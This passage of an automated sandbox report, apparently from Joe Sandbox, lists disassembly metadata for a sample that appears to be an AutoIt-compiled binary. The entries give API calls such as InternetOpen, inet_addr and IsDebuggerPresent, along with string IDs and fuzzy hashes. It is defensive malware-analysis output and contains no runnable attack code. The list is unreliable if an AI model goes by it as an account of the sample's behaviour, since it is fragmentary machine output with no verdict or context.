                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: b3a4154883d2f6819673b72122f3b68b5a78dd4e79b3bdc2df9a28d4f025aee4
                                                            • Instruction ID: 162bcd119fd9e5b5ccc9122d03146e49efb180d96542ed7041f89901ff415f62
                                                            • Opcode Fuzzy Hash: b3a4154883d2f6819673b72122f3b68b5a78dd4e79b3bdc2df9a28d4f025aee4
                                                            • Instruction Fuzzy Hash: 2C514771418B449BD320AF54D896BABBBFCFF84310F42885DF2D9811A5DB308569CB67
                                                            APIs
                                                              • Part of subcall function 0081506B: __fread_nolock.LIBCMT ref: 00815089
                                                            • _wcscmp.LIBCMT ref: 00879AAE
                                                            • _wcscmp.LIBCMT ref: 00879AC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: d863e7e148fd8a10b64e0c294e02ff24869058191715272d49bbc83d120bb969
                                                            • Instruction ID: 5067ab8e3c5c5aec7e3d55f098fc02249dc87739ec485b2403f7bd212a8107f5
                                                            • Opcode Fuzzy Hash: d863e7e148fd8a10b64e0c294e02ff24869058191715272d49bbc83d120bb969
                                                            • Instruction Fuzzy Hash: 07412671A00A19BADF209AA4DC46FEFB7BDFF89710F004079F904E7181D675AA4487A2
                                                            APIs
                                                            • _memset.LIBCMT ref: 00882892
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008828C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: 7d701e3aa5cdbdeae7c5c7b3ed6039bbfb523ebadfba130bddb4652d917b5169
                                                            • Instruction ID: cf284872d5b55d02848f00fe52fb31ee78b8ff0600c567a6273f6d3d117409aa
                                                            • Opcode Fuzzy Hash: 7d701e3aa5cdbdeae7c5c7b3ed6039bbfb523ebadfba130bddb4652d917b5169
                                                            • Instruction Fuzzy Hash: 09311771800119AFCF11AFA5CC85EEEBFB9FF08300F104029F815E6166EB315A96DBA1
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00896D86
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00896DC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: 69de0e830e4bd080005376dc773f5a7cbd7a0689b52f5ccf3ddd82ce233425dd
                                                            • Instruction ID: 80e73a966f8579d7164ce48673189e4ab1265b202c31dfae453babd69fdbbbff
                                                            • Opcode Fuzzy Hash: 69de0e830e4bd080005376dc773f5a7cbd7a0689b52f5ccf3ddd82ce233425dd
                                                            • Instruction Fuzzy Hash: F9318F71210604AEDF14AF68DC80AFB77B9FF48764F188619F9A6D7190DB31AC91CB60
                                                            APIs
                                                            • _memset.LIBCMT ref: 00872E00
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00872E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: a0a41da97058bfd4c5c0736be1ea04e0aa2c2e1a94e1fe0cc26034ea51472493
                                                            • Instruction ID: 39501f43c3f4bf4ef0d920cbf120aaa329ee4ab06e538cd4edb5690f4e3ae653
                                                            • Opcode Fuzzy Hash: a0a41da97058bfd4c5c0736be1ea04e0aa2c2e1a94e1fe0cc26034ea51472493
                                                            • Instruction Fuzzy Hash: D131E932600309EBEB24CF58C88579EBBB5FF45350F14802EE9C9D61A6E770D944CB51
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008969D0
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008969DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: f87514ebbc67b119d1583057b91ff4a51da81f7b4a2ef7af08179a678e1bb55d
                                                            • Instruction ID: 498f0a24050fd02eae88a8d1a2cfb00b2effc82db8df2e3e87dff988b45cadc1
                                                            • Opcode Fuzzy Hash: f87514ebbc67b119d1583057b91ff4a51da81f7b4a2ef7af08179a678e1bb55d
                                                            • Instruction Fuzzy Hash: F611B6716002086FEF11AE14CC90EFB3B6EFB993A4F194125F958D7291E6719C6187A0
                                                            APIs
                                                              • Part of subcall function 00811D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00811D73
                                                              • Part of subcall function 00811D35: GetStockObject.GDI32(00000011), ref: 00811D87
                                                              • Part of subcall function 00811D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00811D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 00896EE0
                                                            • GetSysColor.USER32(00000012), ref: 00896EFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: ff4b55288d233aff62a17035fbeda2a7627df0070e15cb35c1b314c99f4b1250
                                                            • Instruction ID: ac97e088b3942fd433e0c06d059ca5198fe14e4f38e2c77b9a48ea6a262c2117
                                                            • Opcode Fuzzy Hash: ff4b55288d233aff62a17035fbeda2a7627df0070e15cb35c1b314c99f4b1250
                                                            • Instruction Fuzzy Hash: 77215972610209AFDF04EFA8DD45AFA7BB8FB08314F194629FE55D3250E634E8619B50
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00896C11
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00896C20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 639be0a763baa70507fc07ddc6cf348a97369480a8746ba171faa5a94601af4c
                                                            • Instruction ID: 7b7bc7d9b41b6bce66b2424ffd3977f6424c6b6ec5b1201643fa69f54ec1c124
                                                            • Opcode Fuzzy Hash: 639be0a763baa70507fc07ddc6cf348a97369480a8746ba171faa5a94601af4c
                                                            • Instruction Fuzzy Hash: 09119D71500208ABEF106E649C45AEA3769FB04378F184724FA60D31D0E635DCA0AB60
                                                            APIs
                                                            • _memset.LIBCMT ref: 00872F11
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00872F30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: bddc788f2e4b54d85251f9b8c6352270a1282defc5d153e3e01447fcd788e687
                                                            • Instruction ID: 8ea9983f16c6a87f10301ed6414c87ebe7bc6a62d47e9428cfb0177099616c72
                                                            • Opcode Fuzzy Hash: bddc788f2e4b54d85251f9b8c6352270a1282defc5d153e3e01447fcd788e687
                                                            • Instruction Fuzzy Hash: D011B232901128ABDB34EB58DC44B9977B9FB05314F1881B6E958F72A5EBB0ED04C791
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00882520
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00882549
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: 4ec19ddc0d058b7fd131693bf62a2e508564892042b4047b1440019353ab752d
                                                            • Instruction ID: c9c0fdfe53923667bab4d2c5ca4f8380517ebaa8d89a9dc04df2e747c9f76714
                                                            • Opcode Fuzzy Hash: 4ec19ddc0d058b7fd131693bf62a2e508564892042b4047b1440019353ab752d
                                                            • Instruction Fuzzy Hash: DE11C2B0581229BADB28AF518C99EBBFF68FF06765F10812AF905C6140D2706991DBF0
                                                            APIs
                                                              • Part of subcall function 0088830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008880C8,?,00000000,?,?), ref: 00888322
                                                            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008880CB
                                                            • htons.WSOCK32(00000000,?,00000000), ref: 00888108
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 2496851823-2422070025
                                                            • Opcode ID: 38ec333f83760696f0f90925300e46a6ea67238cd66258db95d4e1f182e8d3fb
                                                            • Instruction ID: 9c8288f9010d51f822a4297d12e68f5e2c06f71c4db72921396ebfdffd543e4b
                                                            • Opcode Fuzzy Hash: 38ec333f83760696f0f90925300e46a6ea67238cd66258db95d4e1f182e8d3fb
                                                            • Instruction Fuzzy Hash: A5118234500249EBDB24AFA8CC46FADB764FF44314F108526E911D7292DE71A8158B96
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00869355
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 083e3569aaac5df4a5139094c574f96c522572e223fbbb7b35a4a04fce73e9a7
                                                            • Instruction ID: d10ab09064a06fd2f989f48208b68e57300f3d5b6657fbba4932232c7b4b50b5
                                                            • Opcode Fuzzy Hash: 083e3569aaac5df4a5139094c574f96c522572e223fbbb7b35a4a04fce73e9a7
                                                            • Instruction Fuzzy Hash: 7F01D271A41218ABCB04EB68CC91DFE776DFF06320B150659F872D73D1DB3158488651
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 0086924D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 2aecb5f5667e7dd064be581aa095673c9e788c6ff6dd7e0d869a3233c7a29cb9
                                                            • Instruction ID: 4e33bd7e57ff8e2209976b3ecc258e1002d4fc7276d82dbd878b28d7bbc4e9cd
                                                            • Opcode Fuzzy Hash: 2aecb5f5667e7dd064be581aa095673c9e788c6ff6dd7e0d869a3233c7a29cb9
                                                            • Instruction Fuzzy Hash: 17018471A41208BBCB05EBA4C9A6EFF77ACFF45300F150059B962E73C1EA355E489672
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 0086B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0086B0E7
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 008692D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 23ec14e69c4a2fbc57e8b2699e85b78acff2741680cf8898426677c708246643
                                                            • Instruction ID: fdb862c1b7c2b15eb3e14ae6a325baadce81549e41b0599c138d99d401cfb6fd
                                                            • Opcode Fuzzy Hash: 23ec14e69c4a2fbc57e8b2699e85b78acff2741680cf8898426677c708246643
                                                            • Instruction Fuzzy Hash: 62018471A41108B7CB04E6A4C992EEF77ACFF11300B150159F962E32C2DA355E4C9662
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: cea98f460d3a39749f7bb65fbfef63a605f9a9f5b31d85ffeb22befb43c8739d
                                                            • Instruction ID: 4405bffbb76c1713f8a707d83f89a20bd58084f615b0d1d579f555da1997b799
                                                            • Opcode Fuzzy Hash: cea98f460d3a39749f7bb65fbfef63a605f9a9f5b31d85ffeb22befb43c8739d
                                                            • Instruction Fuzzy Hash: 4AE02B3250022C26D3109699AC05F97F7ACFB40761F00016BFD14D3041E560D90487D1
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008681CA
                                                              • Part of subcall function 00833598: _doexit.LIBCMT ref: 008335A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: d34ec6f7123e4a9683973f8a1ad744bb567f10495a8dae3c9390642b3cedd5a8
                                                            • Instruction ID: d1fcb4650e570a9577eab62e58c0072078634765a3cae426adf2f20bb0c0f7be
                                                            • Opcode Fuzzy Hash: d34ec6f7123e4a9683973f8a1ad744bb567f10495a8dae3c9390642b3cedd5a8
                                                            • Instruction Fuzzy Hash: 9CD0123228531832D61932A96C0AFC57588EB55B52F044026FB0CD55D389D5959142DA
                                                            APIs
                                                              • Part of subcall function 0084B564: _memset.LIBCMT ref: 0084B571
                                                              • Part of subcall function 00830B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0084B540,?,?,?,0081100A), ref: 00830B89
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0081100A), ref: 0084B544
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0081100A), ref: 0084B553
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0084B54E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: 0ee8d6be8a12ceb837c7df9b7d706e6a4970302871638357a2acec26009c1317
                                                            • Instruction ID: 5b58fc5da21865e90d73e4befca46288053fba8afcce497564ff32a4efca0019
                                                            • Opcode Fuzzy Hash: 0ee8d6be8a12ceb837c7df9b7d706e6a4970302871638357a2acec26009c1317
                                                            • Instruction Fuzzy Hash: 5EE06D702007158BD320EF69D804386BBE4FF04755F05892DE546C3752E7B8D448CBA1
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00895BF5
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00895C08
                                                              • Part of subcall function 008754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0087555E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 3bcbc1803ff5abc5a87e02f1922a8f561336ce5662289d6a123459d63ce5ef0c
                                                            • Instruction ID: 72d7cc441800a94ac3c575f3d1341168ccd093cf70ef1ce48ed05094b05323b0
                                                            • Opcode Fuzzy Hash: 3bcbc1803ff5abc5a87e02f1922a8f561336ce5662289d6a123459d63ce5ef0c
                                                            • Instruction Fuzzy Hash: 46D0C931388311B7E768BB70AC0BF976A24FB10B51F09082AB75AEA1E1D9E49840C654